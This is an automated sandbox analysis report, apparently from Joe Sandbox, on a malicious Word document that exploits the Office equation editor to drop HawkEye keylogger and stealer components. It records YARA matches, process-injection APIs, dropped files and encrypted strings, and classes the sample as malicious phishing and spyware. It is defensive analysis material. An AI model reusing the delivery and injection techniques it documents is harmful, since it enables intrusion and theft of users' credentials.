Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large array initializations

Source: 4.2.name.exe.30000.0.unpack, g4K/Dj6.cs	Large array initialization: .cctor: array initializer size 4259
Source: 4.2.name.exe.30000.0.unpack, k0N/Ee6.cs	Large array initialization: .cctor: array initializer size 4998

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\name.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A8598 NtWriteVirtualMemory,		5_2_001A8598
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A8580 NtResumeThread,		5_2_001A8580
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A85A4 NtSetContextThread,		5_2_001A85A4
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001ADA88 NtResumeThread,		5_2_001ADA88
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001AE018 NtSetContextThread,		5_2_001AE018
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A85BC NtResumeThread,		5_2_001A85BC
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A85B0 NtSetContextThread,		5_2_001A85B0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A8670 NtResumeThread,		5_2_001A8670
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A8694 NtSetContextThread,		5_2_001A8694
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A8688 NtWriteVirtualMemory,		5_2_001A8688
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A86AC NtResumeThread,		5_2_001A86AC
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A86A0 NtSetContextThread,		5_2_001A86A0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001ADF60 NtWriteVirtualMemory,		5_2_001ADF60
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,		7_2_00408836

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\name.exe

Code function: 4_2_009E3668 CreateProcessAsUserW,

4_2_009E3668

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00037A33		4_2_00037A33
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00348BB7		4_2_00348BB7
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00347439		4_2_00347439
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00349460		4_2_00349460
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00349450		4_2_00349450
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00347448		4_2_00347448
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0034AAD0		4_2_0034AAD0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_0034AAC0		4_2_0034AAC0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00341C9A		4_2_00341C9A
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E44F9		4_2_009E44F9
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E5821		4_2_009E5821
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E9939		4_2_009E9939
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E2D31		4_2_009E2D31
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E72E2		4_2_009E72E2
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E7A10		4_2_009E7A10
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E3A00		4_2_009E3A00
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009EC228		4_2_009EC228
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E8C98		4_2_009E8C98
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E8C88		4_2_009E8C88
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009EB0E0		4_2_009EB0E0
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E0006		4_2_009E0006
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E0048		4_2_009E0048
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E9110		4_2_009E9110
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E9100		4_2_009E9100
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009ECE58		4_2_009ECE58
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009E1268		4_2_009E1268
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_009EA3E8		4_2_009EA3E8
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_012420B0		5_2_012420B0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A9418		5_2_001A9418
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A9D00		5_2_001A9D00
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001AAD40		5_2_001AAD40
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A72A0		5_2_001A72A0
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001ABB30		5_2_001ABB30
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A7B70		5_2_001A7B70
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001AAD2F		5_2_001AAD2F
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001AC171		5_2_001AC171
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A25AB		5_2_001A25AB
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 5_2_001A6F58		5_2_001A6F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404DDB		6_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040BD8A		6_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404E4C		6_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404EBD		6_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404F4E		6_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00404419		7_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00404516		7_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00413538		7_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004145A1		7_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_0040E639		7_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004337AF		7_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_004399B1		7_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_0043DAE7		7_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00405CF6		7_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00403F85		7_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00411F99		7_2_00411F99

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times

Yara signature match

Source: 5.2.InstallUtil.exe.5e0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.4e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.InstallUtil.exe.2689414.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2684de0.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

.NET source code contains calls to encryption/decryption functions

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

.NET source code contains long base64-encoded strings

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs

Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'zfWNmoVCmw9cYxvRPzpOe7yARVOHExi6TsOCR63LGMs+Lv0nLSEyXoiEOPiEzRyN', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='

Classification label

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@10/15@5/3

Contains functionality for error logging

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

7_2_00415AFD

Contains functionality to check free disk space

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

7_2_00415F87

Contains functionality to enum processes or threads

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

7_2_00411196

Contains functionality to load and extract PE file embedded resources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,

6_2_0040ED0B

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$0072109764552.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD9EA.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\name.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Queries a list of all open handles

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\AppData\Roaming\name.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
